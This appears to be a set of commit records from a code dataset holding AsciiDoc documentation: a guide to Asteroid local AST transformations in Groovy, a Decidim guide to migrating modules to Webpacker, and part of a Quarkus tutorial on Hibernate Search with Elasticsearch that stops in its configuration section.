site\n\n=== Overview\n\nIn order to create a local transformation you need to:\n\n* Create an `annotation` annotated by `@Local`\n* Create an `implementation` of the transformation extending `AbstractLocalTransformation`\n* Your implementation should be annotated by `@Phase` with the proper\n local compilation phase value set.\n\n=== @Local\n\nIn a local transformation you normally use an annotation to mark those\nparts of the code you want to transform: classes, methods... That\nannotation should be annotated as well to tell the compiler that is\ngoing to be used as a transformation marker.\n\nYou can use `@Local` to annotate a marker annotation. The only\n**mandatory** argument is the AST implementation class. Implementation\nclasses should always extend\n`asteroid.local.AbstractLocalTransformation` class.\n\n[source,groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/AsList.groovy[]\n----\n\nIf `@Local` annotation does not indicate which type of element is\nallowed to annotate by the attribute `appliedTo` then is supposed to\nbe used over an element of type `TYPE`, meaning it will be applied\nover an entire class.\n\nUnderneath the `@Local` annotation is doing:\n\n[ditaa,align=center]\n.Local annotation transformation\n....\n\n +-------------------------------+ +------------------------------------------------------+\n | | | |\n | @Local(ImplementationClass) | | @Target([ElementType.TYPE]) |\n | | | @Retention(RetentionPolicy.SOURCE) |\n | |---------->| @GroovyASTTransformationClass(\"ImplementationClass\") |\n | | | |\n +-------------------------------+ +------------------------------------------------------+\n....\n\n=== `applyTo`\n\n`applyTo` attribute is used when the transformation is applied to any\nelement type other than `TYPE`: a method, annotation, field...etc.\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/WithLogging.groovy[]\n----\n\n<1> This annotation will be applied to method elements.\n<2> The class of the AST transformation implementation\n\n=== AbstractLocalTransformation\n\n`asteroid.local.AbstractLocalTransformation` exists to avoid some of the\ndefensive code that you would normally write at the beggining of an\nAST transformation.\n\nWhen coding an AST transformation you always check that the first node\nis an `AnnotationNode` and the second is the type of `ASTNode` you\nexpected to be annotated by the first node. Instead of coding that you\ncan use `AbstractLocalTransformation`.\n\nLets say I have an annotation `@ToMD5`. That annotation can only be\nused in elements of type `FIELD`:\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/ToMD5.groovy[]\n----\n\nI would like to create a method for every field annotated by `ToMD5`\nreturning the MD5 signature of the content of that field.\n\nIn order to implement that I'm using `AbstractLocalTransformation`:\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/ToMD5Impl.groovy[]\n----\n\n<1> Declaring when to apply this transformation with the annotation\n`@Phase` and the correspondent compilation phase.\n<2> Creating a class extending `AbstractLocalTransformation` and declaring\nthat the annotation and the affected node type are `ToMD5` and\n`FieldNode` respectively\n<3> The override method declares the correct generic type `FieldNode`.\n\nFrom this line on you don't have to be worried about casting first and\nsecond node passed to your transformation anymore.\n\nNOTE: Sometimes it comes handy to get a reference to\n`org.codehaus.groovy.control.SourceUnit`. In previous versions\n`SourceUnit` was passed as argument, but it forced to add an import\nwhether you used or not. Now it's present as a class field. Probably\nin future release won't be available directly but through specific\nfunctions.\n\n=== @Phase\n\n`@Phase` is a **required** annotation for both `global` and `local`\ntransformations that indicates in which compilation phase this\ntransformation will be applied.\n\nLets see how `@Phase` annotation is processed in a local transformation:\n\n[ditaa,align=center]\n.Local Transformation\n....\n\n +-----------------------------------------+ +---------------------------------------------------+\n | | | |\n | @Phase(Phase.LOCAL.SEMANTIC_ANALYSIS) | | @InheritConstructors |\n | |---------->| @GroovyASTTransformation(phase=SEMANTIC_ANALYSIS) |\n | | | |\n +-----------------------------------------+ +---------------------------------------------------+\n....\n\n`@Phase` annotation needs a value of type\n`org.codehaus.groovy.control.CompilePhase` enum, but because sometimes\nis hard to remember which phases are available depending on which type\nof transformation we are implementing and it would add one more import\nto our code, `Asteroid` provides a shortcut to these values:\n\n* `asteroid.Phase.LOCAL`\n* `asteroid.Phase.GLOBAL`\n\nThis way is always easier to remember how to get the proper\ncompilation phase. Here's an example:\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/AsListImpl.groovy[]\n----\n\n<1> This is a local transformation to be applied during `SEMANTIC_ANALYSIS` phase.\n\nThis transformation will be applied to those `ClassNode` instances\nannotated with `@AsList`.\n\n[sidebar]\n.Groovy friendly\n****\nWhen used over a local transformation implementation in Groovy, apart\nfrom indicating the compilation phase, underneath, it saves some of\nthe boilerplate code needed to implement an instance of\n`asteroid.local.AbstractLocalTransformation`.\n\nAlthough you can create an `AbstractLocalTransformation` in\nplain Java, you then will have to annotate your transformations like\nthe old days.\n****\n\n=== Compilation errors\n\nIf at some point you would like to stop the compilation process the\nbest approach is to use `addError` method. This method is available\nin both `AbstractLocalTransformation` and `AbstractGlobalTransformation`.\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/GrumpyImpl.groovy[]\n----\n\n=== Checks\n\nThere are many times when you have to check if all precoditions are\ncorrect before applying a given transformation. Without this sanity\ncheck, many things could go wrong. Checks labels are an effort to\navoid boiler plate code when checking the AST state. They are inspired\nin Spock blocks.\n\nBy default checks labels are available in Asteroid local\ntransformations. All you have to do is to structure your code using\nlabels `check` and `then`.\n\nHere's an example, it's a bit silly but I think it will easy to\nunderstand. We have a annotation called `@Serializable`.\n\nThe transformation `SerializableImpl` will make all classes annotated\nwith `@Serializable` to implement `java.io.Serializable`.\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/Serializable.groovy[]\n----\n\nAs constraints I want to make sure:\n\n- The annotated class package name should should start by 'asteroid'\n- The annotated class can only have two method at most\n\n[source, groovy]\n----\ninclude::{testMain}\/asteroid\/local\/samples\/SerializableImpl.groovy[]\n----\n<1> Checking the annotated class belongs to a certain `package`\n<2> Checking that the annotated node has less than two methods\n<3> Transformation code\n\n[sidebar]\n.Limitations\n****\nPlease notice at the moment checks only have a very limited\nfunctionality. They only allow a **one-line** expression. And these\nexpressions can only see `doVisit` parameter values.\n****\n\nTo prove it, there's a test with an annotated class having two\nmethods:\n\n[source, groovy]\n----\ninclude::{testTest}\/asteroid\/local\/samples\/SerializableTest.groovy[tags=checkersShouldFail]\n----\n\nAnd the test... passes :)\n\n==== Your own transformations\n\nIf you would like to add this functionality in your project, you can\nuse Asteroid utility functions to inject this behavior in your code.\n\n[source, java]\n----\ninclude::{coreMain}\/asteroid\/internal\/LocalTransformationTransformation.java[tags=addCheckTo,indent=0]\n----\n\nThis call is taken from Asteroid local transformations. Checking is added to method `doVisit`.","returncode":0,"stderr":"","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"08879eb935d6c461da7281a84e67c3295a88afff","subject":"Docs: Update the module webpacker migration guide (#8180)","message":"Docs: Update the module webpacker migration guide (#8180)\n\n","repos":"AjuntamentdeBarcelona\/decidim,AjuntamentdeBarcelona\/decidim,AjuntamentdeBarcelona\/decidim,codegram\/decidim,decidim\/decidim,codegram\/decidim,codegram\/decidim,codegram\/decidim,decidim\/decidim,AjuntamentdeBarcelona\/decidim,decidim\/decidim","old_file":"docs\/modules\/develop\/pages\/guide_migrate_webpacker_module.adoc","new_file":"docs\/modules\/develop\/pages\/guide_migrate_webpacker_module.adoc","new_contents":"= Migrate to Webpacker a Decidim module\n\nDecidim modules are included to Decidim apps as gems. Since the introduction of Webpacker to manage and compile assets in Decidim, there are some changes required to make modules compatible with Decidim\n\n== About Webpacker\n\nIt's recommended to understand how Webpacker works. More information:\n\n* https:\/\/github.com\/rails\/webpacker#usage\n* https:\/\/edgeguides.rubyonrails.org\/webpacker.html\n\n== Overview\n\nThe recommended way to import assets from a gem in a Rails app using Webpacker is to publish a package in npmjs.org and include it in the package.json via `npm install`. Then the assets are available to Webpack via node_modules\/ folder\n\nOnce created, you should update the instructions to install the module and add the step to add the assets with npm.\n\n== Folder migration\n\nIt's recommend to migrate to the new folders structure:\n\n```\napp\/packs:\n \u251c\u2500\u2500 entrypoints\n \u2514\u2500\u2500 src\n \u2514\u2500\u2500 stylesheets\n \u2514\u2500\u2500 images\n```\n\n== Update Rails helpers\n\n`javascript_include_tag` and `stylesheet_link_tag` have been replaced by `javascript_pack_tag` and `stylesheet_pack_tag`\n\nFor images, if they are in `app\/packs\/images` you could use `image_pack_tag`.\n\n== Asset compilation\n\nAs all assets are now compiled using Webpacker without ever loading the Rails or Decidim environment, there are some new conventions how to tell Webpacker about the Decidim module's assets.\n\nTo begin with, create a new file named `config\/assets.rb` inside your Decidim module.\n\nAfter this, add the following contents in that file, depending what kind of assets your module provides:\n\n[source,ruby]\n----\n# frozen_string_literal: true\n# This file is located at `config\/assets.rb` of your module.\n\n# Define the base path of your module. Please note that `Rails.root` may not be\n# used because we are not inside the Rails environment when this file is loaded.\nbase_path = File.expand_path(\"..\", __dir__)\n\n# Register an additional load path for webpack. All the assets within these\n# directories will be available for inclusion within the Decidim assets. For\n# example, if you have `app\/packs\/src\/decidim\/foo.js`, you can include that file\n# in your JavaScript entrypoints (or other JavaScript files within Decidim)\n# using `import \"src\/decidim\/foo\"` after you have registered the additional path\n# as follows.\nDecidim::Webpacker.register_path(\"#{base_path}\/app\/packs\")\n\n# Register the entrypoints for your module. These entrypoints can be included\n# within your application using `javascript_pack_tag` and if you include any\n# SCSS files within the entrypoints, they become available for inclusion using\n# `stylesheet_pack_tag`.\nDecidim::Webpacker.register_entrypoints(\n decidim_foo: \"#{base_path}\/app\/packs\/entrypoints\/decidim_foo.js\",\n decidim_foo_admin: \"#{base_path}\/app\/packs\/entrypoints\/decidim_foo_admin.js\"\n)\n\n# If you want to import some extra SCSS files in the Decidim main SCSS file\n# without adding any extra stylesheet inclusion tags, you can use the following\n# method to register the stylesheet import for the main application.\nDecidim::Webpacker.register_stylesheet_import(\"stylesheets\/decidim\/foo\/app\")\n\n# If you want to do the same but include the SCSS file for the admin panel's\n# main SCSS file, you can use the following method.\nDecidim::Webpacker.register_stylesheet_import(\"stylesheets\/decidim\/foo\/admin\", group: :admin)\n----\n\n== Component stylesheet migration\n\nIn older Decidim versions your components could define their own stylesheet as follows:\n\n[source,ruby]\n----\nDecidim.register_component(:your_component) do |component|\n component.engine = Decidim::YourComponent::Engine\n component.stylesheet = \"decidim\/your_component\/your_component\"\n component.admin_stylesheet = \"decidim\/your_component\/your_component_admin\"\nend\n----\n\nThese were automatically included in the main application's stylesheet file and also in the admin panel's stylesheet file. These no longer work with Webpacker as the Decidim environment is not loaded when Webpacker compiles the assets.\n\nWhat you should do instead is to follow the asset compilation migration guide above and migrate these definitions into your module's `config\/assets.rb` file as follows:\n\n[source,ruby]\n----\n# frozen_string_literal: true\n# This file is located at `config\/assets.rb` of your module.\n\nbase_path = File.expand_path(\"..\", __dir__)\n\n# Register the additonal path for Webpacker in order to make the module's\n# stylesheets available for inclusion.\nDecidim::Webpacker.register_path(\"#{base_path}\/app\/packs\")\n\n# Register the main application's stylesheet include statement:\nDecidim::Webpacker.register_stylesheet_import(\"stylesheets\/decidim\/your_component\/your_component\")\n\n# Register the admin panel's stylesheet include statement:\nDecidim::Webpacker.register_stylesheet_import(\"stylesheets\/decidim\/your_component\/your_component_admin\", group: :admin)\n----\n","old_contents":"= Migrate to Webpacker a Decidim module\n\nDecidim modules are included to Decidim apps as gems. Since the introduction of Webpacker to manage and compile assets in Decidim, there are some changes required to make modules compatible with Decidim\n\n== About Webpacker\n\nIt's recommended to understand how Webpacker works. More information:\n\n* https:\/\/github.com\/rails\/webpacker#usage\n* https:\/\/edgeguides.rubyonrails.org\/webpacker.html\n\n== Overview\n\nThe recommended way to import assets from a gem in a Rails app using Webpacker is to publish a package in npmjs.org and include it in the package.json via `npm install`. Then the assets are available to Webpack via node_modules\/ folder\n\nOnce created, you should update the instructions to install the module and add the step to add the assets with npm.\n\n== Folder migration\n\nIt's recommend to migrate to the new folders structure:\n\n```\napp\/packs:\n \u251c\u2500\u2500 entrypoints\n \u2514\u2500\u2500 src\n \u2514\u2500\u2500 stylesheets\n \u2514\u2500\u2500 images\n```\n\n== Update Rails helpers\n\n`javascript_include_tag` and `stylesheet_link_tag` have been replaced by `javascript_pack_tag` and `stylesheet_pack_tag`\n\nFor images, if they are in `app\/packs\/images` you could use `image_pack_tag`.\n\n== Asset compilation\n\nThere's no specific or _Rails way_ to deal with assets compilation in engines, more than providing them as npm packages to be included.\n\nIn the community there are great examples of gems that have been adapted to Webpacker, such as https:\/\/github.com\/activeadmin\/activeadmin[ActiveAdmin]\n\nIn ActiveAdmin:\n\n- assets are defined in the package.json file, in an entry named `files:`\n- assets are precompiled using Rollup (a lightweigth Js compiler and packer)\n- a generator has been included to copy files to the Rails folder, do a `npm install` and install the npm package. See https:\/\/github.com\/activeadmin\/activeadmin\/blob\/master\/lib\/generators\/active_admin\/webpacker\/webpacker_generator.rb[the generator]\n\nIt's a good example to follow and get good practices\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"351a7bc2cebbf1bba74ea42197df9798df1f83e6","subject":"Hibernate Search documentation: Avoid using irrelevant configuration in prod mode","message":"Hibernate Search documentation: Avoid using irrelevant configuration in prod mode\n","repos":"quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus,quarkusio\/quarkus","old_file":"docs\/src\/main\/asciidoc\/hibernate-search-orm-elasticsearch.adoc","new_file":"docs\/src\/main\/asciidoc\/hibernate-search-orm-elasticsearch.adoc","new_contents":"\/\/\/\/\nThis guide is maintained in the main Quarkus repository\nand pull requests should be submitted there:\nhttps:\/\/github.com\/quarkusio\/quarkus\/tree\/main\/docs\/src\/main\/asciidoc\n\/\/\/\/\n= Hibernate Search guide\n:hibernate-search-doc-prefix: https:\/\/docs.jboss.org\/hibernate\/search\/6.1\/reference\/en-US\/html_single\/\ninclude::.\/attributes.adoc[]\n\nYou have a Hibernate ORM-based application? You want to provide a full-featured full-text search to your users? You're at the right place.\n\nWith this guide, you'll learn how to synchronize your entities to an Elasticsearch or OpenSearch cluster in a heartbeat with Hibernate Search.\nWe will also explore how you can query your Elasticsearch or OpenSearch cluster using the Hibernate Search API.\n\n== Prerequisites\n\n:prerequisites-time: 20 minutes\n:prerequisites-docker:\ninclude::{includes}\/prerequisites.adoc[]\n\n== Architecture\n\nThe application described in this guide allows to manage a (simple) library: you manage authors and their books.\n\nThe entities are stored in a PostgreSQL database and indexed in an Elasticsearch cluster.\n\n== Solution\n\nWe recommend that you follow the instructions in the next sections and create the application step by step.\nHowever, you can go right to the completed example.\n\nClone the Git repository: `git clone {quickstarts-clone-url}`, or download an {quickstarts-archive-url}[archive].\n\nThe solution is located in the `hibernate-search-orm-elasticsearch-quickstart` {quickstarts-tree-url}\/hibernate-search-orm-elasticsearch-quickstart[directory].\n\n[NOTE]\n====\nThe provided solution contains a few additional elements such as tests and testing infrastructure.\n====\n\n== Creating the Maven project\n\nFirst, we need a new project. Create a new project with the following command:\n\n:create-app-artifact-id: hibernate-search-orm-elasticsearch-quickstart\n:create-app-extensions: hibernate-orm-panache,jdbc-postgresql,hibernate-search-orm-elasticsearch,resteasy-reactive-jackson\ninclude::{includes}\/devtools\/create-app.adoc[]\n\nThis command generates a Maven structure importing the following extensions:\n\n * Hibernate ORM with Panache,\n * the PostgreSQL JDBC driver,\n * Hibernate Search + Elasticsearch,\n * RESTEasy Reactive and Jackson.\n\nIf you already have your Quarkus project configured, you can add the `hibernate-search-orm-elasticsearch` extension\nto your project by running the following command in your project base directory:\n\n:add-extension-extensions: hibernate-search-orm-elasticsearch\ninclude::{includes}\/devtools\/extension-add.adoc[]\n\nThis will add the following to your `pom.xml`:\n\n[source,xml,role=\"primary asciidoc-tabs-target-sync-cli asciidoc-tabs-target-sync-maven\"]\n.pom.xml\n----\n<dependency>\n <groupId>io.quarkus<\/groupId>\n <artifactId>quarkus-hibernate-search-orm-elasticsearch<\/artifactId>\n<\/dependency>\n----\n\n[source,gradle,role=\"secondary asciidoc-tabs-target-sync-gradle\"]\n.build.gradle\n----\nimplementation(\"io.quarkus:quarkus-hibernate-search-orm-elasticsearch\")\n----\n\n== Creating the bare entities\n\nFirst, let's create our Hibernate ORM entities `Book` and `Author` in the `model` subpackage.\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.List;\nimport java.util.Objects;\n\nimport javax.persistence.CascadeType;\nimport javax.persistence.Entity;\nimport javax.persistence.FetchType;\nimport javax.persistence.OneToMany;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\npublic class Author extends PanacheEntity { \/\/ <1>\n\n public String firstName;\n\n public String lastName;\n\n @OneToMany(mappedBy = \"author\", cascade = CascadeType.ALL, orphanRemoval = true, fetch = FetchType.EAGER) \/\/ <2>\n public List<Book> books;\n\n @Override\n public boolean equals(Object o) {\n if (this == o) {\n return true;\n }\n if (!(o instanceof Author)) {\n return false;\n }\n\n Author other = (Author) o;\n\n return Objects.equals(id, other.id);\n }\n\n @Override\n public int hashCode() {\n return 31;\n }\n}\n----\n<1> We are using Hibernate ORM with Panache, it is not mandatory.\n<2> We are loading these elements eagerly so that they are present in the JSON output.\nIn a real world application, you should probably use a DTO approach.\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.Objects;\n\nimport javax.persistence.Entity;\nimport javax.persistence.ManyToOne;\n\nimport com.fasterxml.jackson.annotation.JsonIgnore;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\npublic class Book extends PanacheEntity {\n\n public String title;\n\n @ManyToOne\n @JsonIgnore <1>\n public Author author;\n\n @Override\n public boolean equals(Object o) {\n if (this == o) {\n return true;\n }\n if (!(o instanceof Book)) {\n return false;\n }\n\n Book other = (Book) o;\n\n return Objects.equals(id, other.id);\n }\n\n @Override\n public int hashCode() {\n return 31;\n }\n}\n----\n<1> We mark this property with `@JsonIgnore` to avoid infinite loops when serializing with Jackson.\n\n== Initializing the REST service\n\nWhile everything is not yet set up for our REST service, we can initialize it with the standard CRUD operations we will need.\n\nCreate the `org.acme.hibernate.search.elasticsearch.LibraryResource` class:\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch;\n\nimport java.util.List;\nimport java.util.Optional;\n\nimport javax.enterprise.event.Observes;\nimport javax.inject.Inject;\nimport javax.transaction.Transactional;\nimport javax.ws.rs.DELETE;\nimport javax.ws.rs.GET;\nimport javax.ws.rs.POST;\nimport javax.ws.rs.PUT;\nimport javax.ws.rs.Path;\nimport javax.ws.rs.core.MediaType;\n\nimport org.acme.hibernate.search.elasticsearch.model.Author;\nimport org.acme.hibernate.search.elasticsearch.model.Book;\nimport org.hibernate.search.mapper.orm.session.SearchSession;\nimport org.jboss.resteasy.reactive.RestForm;\nimport org.jboss.resteasy.reactive.RestQuery;\n\nimport io.quarkus.runtime.StartupEvent;\n\n@Path(\"\/library\")\npublic class LibraryResource {\n\n @PUT\n @Path(\"book\")\n @Transactional\n @Consumes(MediaType.APPLICATION_FORM_URLENCODED)\n public void addBook(@RestForm String title, @RestForm Long authorId) {\n Author author = Author.findById(authorId);\n if (author == null) {\n return;\n }\n\n Book book = new Book();\n book.title = title;\n book.author = author;\n book.persist();\n\n author.books.add(book);\n author.persist();\n }\n\n @DELETE\n @Path(\"book\/{id}\")\n @Transactional\n public void deleteBook(Long id) {\n Book book = Book.findById(id);\n if (book != null) {\n book.author.books.remove(book);\n book.delete();\n }\n }\n\n @PUT\n @Path(\"author\")\n @Transactional\n @Consumes(MediaType.APPLICATION_FORM_URLENCODED)\n public void addAuthor(@RestForm String firstName, @RestForm String lastName) {\n Author author = new Author();\n author.firstName = firstName;\n author.lastName = lastName;\n author.persist();\n }\n\n @POST\n @Path(\"author\/{id}\")\n @Transactional\n @Consumes(MediaType.APPLICATION_FORM_URLENCODED)\n public void updateAuthor(Long id, @RestForm String firstName, @RestForm String lastName) {\n Author author = Author.findById(id);\n if (author == null) {\n return;\n }\n author.firstName = firstName;\n author.lastName = lastName;\n author.persist();\n }\n\n @DELETE\n @Path(\"author\/{id}\")\n @Transactional\n public void deleteAuthor(Long id) {\n Author author = Author.findById(id);\n if (author != null) {\n author.delete();\n }\n }\n}\n----\n\nNothing out of the ordinary here: it is just good old Hibernate ORM with Panache operations in a REST service.\n\nIn fact, the interesting part is that we will need to add very few elements to make our full text search application working.\n\n== Using Hibernate Search annotations\n\nLet's go back to our entities.\n\nEnabling full text search capabilities for them is as simple as adding a few annotations.\n\nLet's edit the `Book` entity again to include this content:\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.Objects;\n\nimport javax.persistence.Entity;\nimport javax.persistence.ManyToOne;\n\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.FullTextField;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.Indexed;\n\nimport com.fasterxml.jackson.annotation.JsonIgnore;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\n@Indexed \/\/ <1>\npublic class Book extends PanacheEntity {\n\n @FullTextField(analyzer = \"english\") \/\/ <2>\n public String title;\n\n @ManyToOne\n @JsonIgnore\n public Author author;\n\n \/\/ Preexisting equals()\/hashCode() methods\n}\n----\n<1> First, let's use the `@Indexed` annotation to register our `Book` entity as part of the full text index.\n<2> The `@FullTextField` annotation declares a field in the index specifically tailored for full text search.\nIn particular, we have to define an analyzer to split and analyze the tokens (~ words) - more on this later.\n\nNow that our books are indexed, we can do the same for the authors.\n\nOpen the `Author` class and include the content below.\n\nThings are quite similar here: we use the `@Indexed`, `@FullTextField` and `@KeywordField` annotations.\n\nThere are a few differences\/additions though. Let's check them out.\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.model;\n\nimport java.util.List;\nimport java.util.Objects;\n\nimport javax.persistence.CascadeType;\nimport javax.persistence.Entity;\nimport javax.persistence.FetchType;\nimport javax.persistence.OneToMany;\n\nimport org.hibernate.search.engine.backend.types.Sortable;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.FullTextField;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.Indexed;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.IndexedEmbedded;\nimport org.hibernate.search.mapper.pojo.mapping.definition.annotation.KeywordField;\n\nimport io.quarkus.hibernate.orm.panache.PanacheEntity;\n\n@Entity\n@Indexed\npublic class Author extends PanacheEntity {\n\n @FullTextField(analyzer = \"name\") \/\/ <1>\n @KeywordField(name = \"firstName_sort\", sortable = Sortable.YES, normalizer = \"sort\") \/\/ <2>\n public String firstName;\n\n @FullTextField(analyzer = \"name\")\n @KeywordField(name = \"lastName_sort\", sortable = Sortable.YES, normalizer = \"sort\")\n public String lastName;\n\n @OneToMany(mappedBy = \"author\", cascade = CascadeType.ALL, orphanRemoval = true, fetch = FetchType.EAGER)\n @IndexedEmbedded \/\/ <3>\n public List<Book> books;\n\n \/\/ Preexisting equals()\/hashCode() methods\n}\n----\n<1> We use a `@FullTextField` similar to what we did for `Book` but you'll notice that the analyzer is different - more on this later.\n<2> As you can see, we can define several fields for the same property.\nHere, we define a `@KeywordField` with a specific name.\nThe main difference is that a keyword field is not tokenized (the string is kept as one single token) but can be normalized (i.e. filtered) - more on this later.\nThis field is marked as sortable as our intention is to use it for sorting our authors.\n<3> The purpose of `@IndexedEmbedded` is to include the `Book` fields into the `Author` index.\nIn this case, we just use the default configuration: all the fields of the associated `Book` entities are included in the index (i.e. the `title` field).\nThe nice thing with `@IndexedEmbedded` is that it is able to automatically reindex an `Author` if one of its ``Book``s has been updated thanks to the bidirectional relation.\n`@IndexedEmbedded` also supports nested documents (using the `storage = NESTED` attribute), but we don't need it here.\nYou can also specify the fields you want to include in your parent index using the `includePaths` attribute if you don't want them all.\n\n== Analyzers and normalizers\n\n=== Introduction\n\nAnalysis is a big part of full text search: it defines how text will be processed when indexing or building search queries.\n\nThe role of analyzers is to split the text into tokens (~ words) and filter them (making it all lowercase and removing accents for instance).\n\nNormalizers are a special type of analyzers that keeps the input as a single token.\nIt is especially useful for sorting or indexing keywords.\n\nThere are a lot of bundled analyzers, but you can also develop your own for your own specific purposes.\n\nYou can learn more about the Elasticsearch analysis framework in the https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/analysis.html[Analysis section of the Elasticsearch documentation].\n\n=== Defining the analyzers used\n\nWhen we added the Hibernate Search annotations to our entities, we defined the analyzers and normalizers used.\nTypically:\n\n[source,java]\n----\n@FullTextField(analyzer = \"english\")\n----\n\n[source,java]\n----\n@FullTextField(analyzer = \"name\")\n----\n\n[source,java]\n----\n@KeywordField(name = \"lastName_sort\", sortable = Sortable.YES, normalizer = \"sort\")\n----\n\nWe use:\n\n * an analyzer called `name` for person names,\n * an analyzer called `english` for book titles,\n * a normalizer called `sort` for our sort fields\n\nbut we haven't set them up yet.\n\nLet's see how you can do it with Hibernate Search.\n\n[[analysis-configurer]]\n=== Setting up the analyzers\n\nIt is an easy task, we just need to create an implementation of `ElasticsearchAnalysisConfigurer`\n(and configure Quarkus to use it, more on that later).\n\nTo fulfill our requirements, let's create the following implementation:\n\n[source,java]\n----\npackage org.acme.hibernate.search.elasticsearch.config;\n\nimport org.hibernate.search.backend.elasticsearch.analysis.ElasticsearchAnalysisConfigurationContext;\nimport org.hibernate.search.backend.elasticsearch.analysis.ElasticsearchAnalysisConfigurer;\n\nimport javax.enterprise.context.Dependent;\nimport javax.inject.Named;\n\n@Dependent\n@Named(\"myAnalysisConfigurer\") \/\/ <1>\npublic class AnalysisConfigurer implements ElasticsearchAnalysisConfigurer {\n\n @Override\n public void configure(ElasticsearchAnalysisConfigurationContext context) {\n context.analyzer(\"name\").custom() \/\/ <2>\n .tokenizer(\"standard\")\n .tokenFilters(\"asciifolding\", \"lowercase\");\n\n context.analyzer(\"english\").custom() \/\/ <3>\n .tokenizer(\"standard\")\n .tokenFilters(\"asciifolding\", \"lowercase\", \"porter_stem\");\n\n context.normalizer(\"sort\").custom() \/\/ <4>\n .tokenFilters(\"asciifolding\", \"lowercase\");\n }\n}\n----\n<1> We will need to reference the configurer from the configuration properties, so we make it a named bean.\n<2> This is a simple analyzer separating the words on spaces, removing any non-ASCII characters by its ASCII counterpart (and thus removing accents) and putting everything in lowercase.\nIt is used in our examples for the author's names.\n<3> We are a bit more aggressive with this one and we include some stemming: we will be able to search for `mystery` and get a result even if the indexed input contains `mysteries`.\nIt is definitely too aggressive for person names, but it is perfect for the book titles.\n<4> Here is the normalizer used for sorting. Very similar to our first analyzer, except we don't tokenize the words as we want one and only one token.\n\n== Adding full text capabilities to our REST service\n\nIn our existing `LibraryResource`, we just need to inject the `SearchSession`:\n\n[source,java]\n----\n @Inject\n SearchSession searchSession; \/\/ <1>\n----\n<1> Inject a Hibernate Search session, which relies on the `EntityManager` under the hood.\nApplications with multiple persistence units can use the CDI qualifier `@io.quarkus.hibernate.orm.PersistenceUnit`\nto select the right one:\nsee <<multiple-persistence-units-attaching-cdi>>.\n\nAnd then we can add the following methods (and a few ``import``s):\n\n[source,java]\n----\n @Transactional \/\/ <1>\n void onStart(@Observes StartupEvent ev) throws InterruptedException { \/\/ <2>\n \/\/ only reindex if we imported some content\n if (Book.count() > 0) {\n searchSession.massIndexer()\n .startAndWait();\n }\n }\n\n @GET\n @Path(\"author\/search\") \/\/ <3>\n @Transactional\n public List<Author> searchAuthors(@RestQuery String pattern, \/\/ <4>\n @RestQuery Optional<Integer> size) {\n return searchSession.search(Author.class) \/\/ <5>\n .where(f ->\n pattern == null || pattern.trim().isEmpty() ?\n f.matchAll() : \/\/ <6>\n f.simpleQueryString()\n .fields(\"firstName\", \"lastName\", \"books.title\").matching(pattern) \/\/ <7>\n )\n .sort(f -> f.field(\"lastName_sort\").then().field(\"firstName_sort\")) \/\/ <8>\n .fetchHits(size.orElse(20)); \/\/ <9>\n }\n----\n<1> Important point: we need a transactional context for these methods.\n<2> As we will import data into the PostgreSQL database using an SQL script, we need to reindex the data at startup.\nFor this, we use Hibernate Search's mass indexer, which allows to index a lot of data efficiently (you can fine tune it for better performances).\nAll the upcoming updates coming through Hibernate ORM operations will be synchronized automatically to the full text index.\nIf you don't import data manually in the database, you don't need that:\nthe mass indexer should then only be used when you change your indexing configuration (adding a new field, changing an analyzer's configuration...) and you want the new configuration to be applied to your existing entities.\n<3> This is where the magic begins: just adding the annotations to our entities makes them available for full text search: we can now query the index using the Hibernate Search DSL.\n<4> Use the `org.jboss.resteasy.reactive.RestQuery` annotation type to avoid repeating the parameter name.\n<5> We indicate that we are searching for ``Author``s.\n<6> We create a predicate: if the pattern is empty, we use a `matchAll()` predicate.\n<7> If we have a valid pattern, we create a https:\/\/www.elastic.co\/guide\/en\/elasticsearch\/reference\/current\/query-dsl-simple-query-string-query.html[`simpleQueryString()`] predicate on the `firstName`, `lastName` and `books.title` fields matching our pattern.\n<8> We define the sort order of our results. Here we sort by last name, then by first name. Note that we use the specific fields we created for sorting.\n<9> Fetch the `size` top hits, `20` by default. Obviously, paging is also supported.\n\n[NOTE]\n====\nThe Hibernate Search DSL supports a significant subset of the Elasticsearch predicates (match, range, nested, phrase, spatial...).\nFeel free to explore the DSL using autocompletion.\n\nWhen that's not enough, you can always fall back to\nlink:{hibernate-search-doc-prefix}#search-dsl-predicate-extensions-elasticsearch-from-json[defining a predicate using JSON directly].\n====\n\n== Configuring the application\n\nAs usual, we can configure everything in the Quarkus configuration file, `application.properties`.\n\nEdit `src\/main\/resources\/application.properties` and inject the following configuration:\n\n[source,properties]\n----\nquarkus.ssl.native=false <1>\n\nquarkus.datasource.db-kind=postgresql <2>\n\n%dev.quarkus.hibernate-orm.database.generation=drop-and-create <3>\n%test.quarkus.hibernate-orm.database.generation=drop-and-create <3>\nquarkus.hibernate-orm.sql-load-script=import.sql <4>\n\nquarkus.hibernate-search-orm.elasticsearch.version=7 